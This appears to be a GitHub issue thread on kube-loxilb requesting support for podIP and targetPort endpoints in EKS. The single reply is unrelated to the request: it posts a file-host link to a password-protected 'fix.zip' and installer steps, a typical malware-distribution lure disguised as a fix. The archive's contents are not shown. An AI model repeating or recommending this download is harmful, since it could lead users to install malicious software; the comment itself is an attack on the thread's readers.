### ISSUE TITLE
Support for podIP and targetPort as endpoints 

### ISSUE THREAD

**Issue by TrekkieCoder** [loxilb-io/kube-loxilb#165]
In EKS, with the default VPC plugin the pods can directly be accessed by podIP/targetPort in addition to usual nodeIP/nodePort from within the same VPC. This feature support will help reduce unnecessary hops introduced by kube-proxy when there is no such need.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
